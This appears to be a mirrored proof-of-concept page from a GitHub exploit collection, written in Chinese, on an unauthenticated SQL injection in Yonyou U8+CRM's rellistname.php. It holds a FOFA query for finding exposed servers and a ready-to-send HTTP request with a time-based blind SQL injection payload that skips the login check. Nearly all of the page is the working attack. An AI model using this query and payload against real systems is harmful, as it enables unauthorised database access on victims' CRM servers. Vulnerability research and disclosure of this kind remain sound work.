mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 05:54:14 +00:00
19 lines
580 B
Markdown
19 lines
580 B
Markdown
# 用友U8-CRM接口rellistname.php存在SQL注入漏洞
|
||
|
||
用友U8+CRM /config/rellistname.php 文件多个方法存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句。
|
||
|
||
## fofa
|
||
|
||
```javascript
|
||
body="用友U8CRM" || body="/js/tfunction.js" || title="用友U8CRM"
|
||
```
|
||
|
||
## poc
|
||
|
||
```javascript
|
||
GET /config/rellistname.php?DontCheckLogin=1&objType=1&reportID=1+wAiTFOR+DeLAy'0:0:4'--+- HTTP/1.1
|
||
Host:
|
||
Cookie: PHPSESSID=bgsesstimeout-;
|
||
```
|
||
|
||
 |